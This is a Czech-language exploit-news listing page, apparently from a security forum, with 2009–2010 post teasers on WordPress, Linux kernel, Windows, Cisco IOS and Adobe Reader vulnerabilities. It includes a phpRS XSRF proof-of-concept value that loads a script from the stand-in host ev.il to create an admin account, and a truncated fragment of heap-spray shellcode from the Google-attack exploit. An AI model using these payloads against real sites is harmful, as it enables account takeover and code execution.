Aby se dosáhlo velkého, je třeba začít s menším.
Exploit
Zdrojové kódy zajímavých exploitů
WordPress obsahuje závažnou chybu umožňující DoS
Vložil/a RubberDuck, 21 Říjen, 2009 - 10:25
Před pár dny se objevila advisorka popisující závažnou bezpečnostní chybu v CMS WordPress umožňující utoč DoS útok na server a jeho následné vytížení a nedostupnost.
Zdroj:
- Pro možnost psaní komentářů se přihlašte nebo zaregistrujte.
- Číst dál
phpRS 2.8.1a XSRF POC EXPLOIT
Vložil/a 4194, 29 Leden, 2010 - 12:20
PHPRS 2.8.1A XSRF POC EXPLOIT
VULN: REGISTRATION (readers.php), INPUTS ‘rcelejmeno’ && ‘rmail’
VALUE: “-</td><script src=http://ev.il/xpl.js />”
AUTHOR: 4194
EXPLOIT_DESCRIPTION: creating new admin account
- Pro možnost psaní komentářů se přihlašte nebo zaregistrujte.
- Číst dál
Exploit použitý k útoku na korporátní síť Googlu
Vložil/a cm3l1k1, 28 Leden, 2010 - 17:48
UPDATE
<html><script>
var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
Chyba zneužitelná od Windows NT 3.1 až po Windows 7 (Ring 0 Escalation Vulnerability)
Vložil/a cm3l1k1, 21 Leden, 2010 - 13:58
Na Internetu se objevil exploit umožňující eskalaci oprávnění díky kódu, který je ve Windows od roku 1993.
- Pro možnost psaní komentářů se přihlašte nebo zaregistrujte.
- Číst dál
Twitter pod útokem iránských hackerů
Vložil/a infinity, 18 Prosinec, 2009 - 17:36
... na Twitter byly během včerejšího dne vedeny hackerské útoky, ke kterým se přihlásila skupina „Iranian Cyber Army“ (Íránská kyberarmáda).
- Pro možnost psaní komentářů se přihlašte nebo zaregistrujte.
- Číst dál
Linux Kernel 2.x sock_sendpage()
Vložil/a czYber ph0enix, 15 Srpen, 2009 - 11:43
A máme tu další lokální exploit pro Linux.
- Pro možnost psaní komentářů se přihlašte nebo zaregistrujte.
- Číst dál
Linux 2.6.30+ Local Kernel Exploit 0day - disabling SELinux, AppArmor and LSM
Vložil/a cm3l1k1, 11 Srpen, 2009 - 17:29
jj asi bude Grsecurity dobrá volba :o)
Souhrn Cisco IOS zranitelností
Vložil/a cm3l1k1, 27 Duben, 2009 - 16:39
Cisco vydalo souhrn osmi zranitelností v IOS software, ke kterým přidalo popis chyby a metodu prevence/opatchování.
Individual publication links are listed below:
Linux Kernel Local Privilege Escalation Exploit
Vložil/a RubberDuck, 9 Duben, 2009 - 16:18
Milen Rangelov, vystupující pod pseudonymem gat3way, zveřejnil exploit umožňující utočníkovi v Linuxu lokální navýšení práv. Zasažena jsou jádra ve verzi 2.6.29 a nižší.
Kritická chyba v Adobe Readeru se 'toulá' Internetem
Vložil/a RubberDuck, 22 Únor, 2009 - 14:15
Kritická chyba v Adobe Readeru umožňující na počítači oběti spustit libovolný JavaScriptový kód se síří Internetem. Zasaženy jsou verze 7.x a vyšší.
- Pro možnost psaní komentářů se přihlašte nebo zaregistrujte.
- Číst dál
